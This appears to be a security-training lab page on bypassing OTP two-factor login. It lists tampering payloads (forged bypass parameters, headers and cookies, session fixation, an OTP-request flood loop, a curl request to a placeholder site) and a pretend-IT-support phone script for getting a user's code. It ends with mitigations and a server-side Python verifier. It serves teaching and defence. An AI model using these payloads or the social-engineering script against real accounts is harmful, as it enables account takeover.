Lab 1: Basic OTP Bypass

Basic OTP bypass techniques

Difficulty: Low

Lab Overview

This lab demonstrates basic OTP bypass vulnerabilities where attackers can circumvent OTP authentication through simple techniques like parameter manipulation, session hijacking, and basic social engineering.

Objective: Understand how basic OTP bypass attacks work and how to exploit them.

Vulnerable OTP System
Two-Factor Authentication

This system uses OTP for two-factor authentication. Try to bypass the OTP verification:

⚠️ OTP Bypass Warning

This lab demonstrates basic OTP bypass vulnerabilities:

  • Parameter Manipulation - URL parameter tampering
  • Session Hijacking - Session token theft
  • Social Engineering - Human manipulation
  • No Rate Limiting - Unlimited attempts
Bypass Techniques
Parameter Manipulation

    // URL parameter tampering
    ?otp_verified=true
    ?bypass_otp=1
    ?skip_verification=yes

Session Hijacking

    // Steal session token
    document.cookie = "session_id=stolen_token";
    // Or use session fixation
    ?PHPSESSID=fixed_session_id

Social Engineering

    // Call user pretending to be support
    "Hi, this is IT support. We need to verify your account. Can you share the OTP you just received?"

No Rate Limiting

    // Unlimited OTP requests
    for (let i = 0; i < 1000; i++) {
      fetch('/send_otp', {method: 'POST'});
    }

Client-Side Bypass

    // Disable JavaScript validation
    document.getElementById('otp').disabled = false;
    // Or modify form action
    form.action = '/bypass_otp';

Header Manipulation

    // Add bypass headers
    X-Bypass-OTP: true
    X-Admin-Override: 1
    X-Skip-Verification: yes
Vulnerability Details
  • Type: Basic OTP Bypass
  • Severity: Medium
  • Method: Parameter manipulation
  • Issue: Missing validation
Basic OTP Bypass Examples

Use these techniques to exploit basic OTP bypass vulnerabilities:

1. URL Parameter Bypass:

    // Add bypass parameters to URL
    ?otp_verified=true
    ?bypass_otp=1
    ?skip_verification=yes
    ?admin_override=1
    ?otp_status=verified

2. POST Parameter Bypass:

    // Send bypass parameters in POST data
    otp_verified=true
    bypass_otp=1
    skip_verification=yes
    admin_override=1
    otp_status=verified

3. Header Bypass:

    // Add bypass headers
    X-Bypass-OTP: true
    X-Admin-Override: 1
    X-Skip-Verification: yes
    X-OTP-Status: verified
    X-Override-Auth: true

4. Cookie Bypass:

    // Set bypass cookies
    otp_verified=true
    bypass_otp=1
    skip_verification=yes
    admin_override=1
    otp_status=verified

5. Session Bypass:

    // Manipulate session variables
    $_SESSION['otp_verified'] = true;
    $_SESSION['bypass_otp'] = 1;
    $_SESSION['skip_verification'] = true;
    $_SESSION['admin_override'] = 1;

6. JavaScript Bypass:

    // Disable client-side validation
    document.getElementById('otp').disabled = false;
    document.getElementById('otp').value = 'bypass';
    // Or modify form action
    form.action = '/bypass_otp';
    // Or submit form without OTP
    form.submit();

7. Form Manipulation:

    // Add hidden bypass fields

8. AJAX Bypass:

    // Send bypass request via AJAX
    fetch('/verify_otp', {
      method: 'POST',
      headers: {'Content-Type': 'application/json'},
      body: JSON.stringify({
        otp: 'bypass',
        otp_verified: true,
        bypass_otp: 1
      })
    });

9. cURL Bypass:

    // Send bypass request via cURL
    curl -X POST http://vulnerable-site.com/verify_otp \
      -d "otp=bypass&otp_verified=true&bypass_otp=1" \
      -H "X-Bypass-OTP: true"

10. Browser DevTools Bypass:

    // Use browser dev tools to modify
    // 1. Open DevTools (F12)
    // 2. Go to Network tab
    // 3. Intercept the OTP verification request
    // 4. Modify the request parameters
    // 5. Send the modified request
Real-World Attack Scenarios
Mitigation Strategies
  • Implement proper server-side validation
  • Use secure session management
  • Implement rate limiting and throttling
  • Use secure OTP generation and delivery
  • Perform regular security testing and vulnerability assessments
  • Monitor for unusual authentication patterns
  • Implement proper authentication and authorization
  • Use secure coding practices
  • Implement proper error handling
  • Educate users about OTP security
  • Use multi-factor authentication
  • Implement proper logging and monitoring
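As an added defensive counterpart to the mitigations above (example code written for this page, not part of the lab), the following Python verifier keeps all OTP state in the server-side session, reads nothing but the otp field from the request, enforces expiry and an attempt limit, and burns the code on success, so the parameter, header and cookie payloads shown in this lab have no effect. The request dict shape and the MAX_ATTEMPTS / OTP_TTL_SECONDS values are assumptions.

```python
import hmac
import secrets
import time

MAX_ATTEMPTS = 5          # lock the challenge after this many wrong guesses (assumed policy)
OTP_TTL_SECONDS = 300     # OTP expires five minutes after issue (assumed policy)

def issue_otp(session, now=None):
    """Server generates the OTP and records it in the server-side session only.
    Verification state is never read back from the client."""
    now = time.time() if now is None else now
    session["otp_code"] = f"{secrets.randbelow(10**6):06d}"
    session["otp_issued_at"] = now
    session["otp_attempts"] = 0
    session["otp_verified"] = False   # the only flag the app ever trusts
    return session["otp_code"]        # returned so the caller can deliver it out of band

def verify_otp(session, request, now=None):
    """Decide an OTP submission using server-side state only.
    `request` is a dict with 'params', 'headers', 'cookies' (constructed shape
    for this example); only request['params']['otp'] is consulted, so
    otp_verified=true, X-Bypass-OTP or a forged cookie change nothing."""
    now = time.time() if now is None else now
    code = session.get("otp_code")
    if code is None:
        return "no_challenge"                       # nothing issued for this session
    if now - session.get("otp_issued_at", 0) > OTP_TTL_SECONDS:
        session.pop("otp_code", None)               # expired: force a fresh challenge
        return "expired"
    if session.get("otp_attempts", 0) >= MAX_ATTEMPTS:
        return "locked"                             # attempt limit hit: no more guesses
    submitted = str(request.get("params", {}).get("otp", ""))
    # Constant-time comparison avoids leaking the code through timing.
    if submitted and hmac.compare_digest(submitted, code):
        session["otp_verified"] = True
        session.pop("otp_code", None)               # single use: burn the code
        return "ok"
    session["otp_attempts"] = session.get("otp_attempts", 0) + 1
    return "invalid"

def is_second_factor_satisfied(session):
    """Gate protected routes on the server-side flag, never on request data."""
    return session.get("otp_verified") is True
```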